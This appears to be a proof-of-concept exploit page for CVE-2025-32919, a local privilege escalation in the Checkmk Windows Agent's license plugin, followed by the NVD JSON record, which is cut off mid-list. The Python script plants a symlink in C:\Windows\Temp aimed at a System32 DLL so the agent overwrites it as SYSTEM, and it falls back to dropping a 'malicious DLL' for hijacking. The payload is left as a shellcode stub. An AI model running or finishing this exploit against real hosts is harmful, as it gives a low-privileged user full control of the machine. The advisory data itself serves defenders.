CVE-2025-32919

# CVE-2025-32919 - Checkmk Windows Agent License Plugin Privilege Escalation PoC # Vulnerability: Insecure temporary directory usage in Windows License plugin # Attack Vector: Symlink attack on predictable temp directory import os import sys import tempfile from pathlib import Path # Step 1: Identify the insecure temporary directory used by Checkmk Agent # The License plugin typically uses C:\Windows\Temp or a predictable path TEMP_DIR = r"C:\Windows\Temp" TARGET_FILE = os.path.join(TEMP_DIR, "checkmk_license.tmp") # Step 2: Create a symlink pointing to a privileged location # This is the core of the symlink attack def create_symlink_attack(): """ Create a symbolic link in the temp directory pointing to a system file we want to overwrite with SYSTEM privileges. """ # Target: a system DLL or executable that will be overwritten # when the Checkmk Agent writes to the temp file privileged_target = r"C:\Windows\System32\target_service.dll" try: # Remove existing file/link if present if os.path.exists(TARGET_FILE) or os.path.islink(TARGET_FILE): os.remove(TARGET_FILE) # Create symlink (requires Developer Mode or admin for non-admin users) os.symlink(privileged_target, TARGET_FILE) print(f"[+] Symlink created: {TARGET_FILE} -> {privileged_target}") except OSError as e: print(f"[-] Symlink creation failed: {e}") print("[*] Falling back to file replacement method...") # Alternative: place malicious DLL directly in temp directory place_malicious_dll() def place_malicious_dll(): """ Place a malicious DLL in the temp directory for DLL hijacking. """ malicious_dll = os.path.join(TEMP_DIR, "license_helper.dll") # Write a malicious DLL payload here # When Checkmk Agent loads this DLL, it executes with SYSTEM privileges payload = b"MZ\x90\x00" # PE header stub - replace with actual shellcode with open(malicious_dll, "wb") as f: f.write(payload) print(f"[+] Malicious DLL placed at: {malicious_dll}") # Step 3: Wait for Checkmk Agent to execute and trigger the vulnerability def wait_for_agent_execution(): """ Monitor the temp directory for the agent's file operations. The agent typically runs periodically or on service start. """ print("[*] Waiting for Checkmk Agent execution...") print("[*] Trigger: Restart the Checkmk Agent service or wait for scheduled run") # In a real attack, you would: # 1. Restart the Checkmk Windows Agent service # 2. Or wait for the agent's scheduled execution # 3. The agent will write to the temp file, following our symlink # 4. SYSTEM-level code execution achieved if __name__ == "__main__": print("=" * 60) print("CVE-2025-32919 - Checkmk Agent Privilege Escalation PoC") print("=" * 60) create_symlink_attack() wait_for_agent_execution()

{"cve": {"id": "CVE-2025-32919", "sourceIdentifier": "[email protected]", "published": "2025-10-09T15:16:06.057", "lastModified": "2025-12-04T20:39:36.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of an insecure temporary directory in the Windows License plugin for the Checkmk Windows Agent allows Privilege Escalation. This issue affects Checkmk: from 2.4.0 before 2.4.0p13, from 2.3.0 before 2.3.0p38, from 2.2.0 before 2.2.0p46, and all versions of 2.1.0 (EOL)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.2.0", "matchCriteriaId": "4491352C-E13B-45DF-AC48-50B27AE037BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "C66704F1-0B5E-4B43-8748-987022F378F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:*", "matchCriteriaId": "3FB7221E-BE9F-4529-8E07-8AD547FA3208"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:*", "matchCriteriaId": "30A074AD-9499-46E3-AB67-D6CEE3AA01C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:*", "matchCriteriaId": "A8BD0240-A22B-4273-BD47-C35A8C12E127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p12:*:*:*:*:*:*", "matchCriteriaId": "DAA5680F-1DD0-48AA-BB7F-15B27365F0FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p13:*:*:*:*:*:*", "matchCriteriaId": "BC2F31CA-D4EB-44E6-9A09-5255D33F4A88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p14:*:*:*:*:*:*", "matchCriteriaId": "CD80BD69-20C6-4E17-B165-98689179A5A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p16:*:*:*:*:*:*", "matchCriteriaId": "7DE79896-EBE5-42F2-A126-2A871BBA1071"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p17:*:*:*:*:*:*", "matchCriteriaId": "51A44E69-EEA1-4B01-B7B3-5BF7B39819E3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p18:*:*:*:*:*:*", "matchCriteriaId": "BCB65AEB-CF52-410B-92B1-2DCFB914FFA4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p19:*:*:*:*:*:*", "matchCriteriaId": "B7E17FA6-9011-489C-9FA9-368CA2D86FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p21:*:*:*:*:*:*", "matchCriteriaId": "8735357F-16A7-4408-9DDD-1C6796BADBE9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p22:*:*:*:*:*:*", "matchCriteriaId": "4505098C-0A2B-481E-A3DF-D6DF8EFA4DE7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p23:*:*:*:*:*:*", "matchCriteriaId": "C12AFCCF-014E-4EEB-8F04-F1ACE182BA98"}, {"vulnerable": true, "criteri ... (truncated)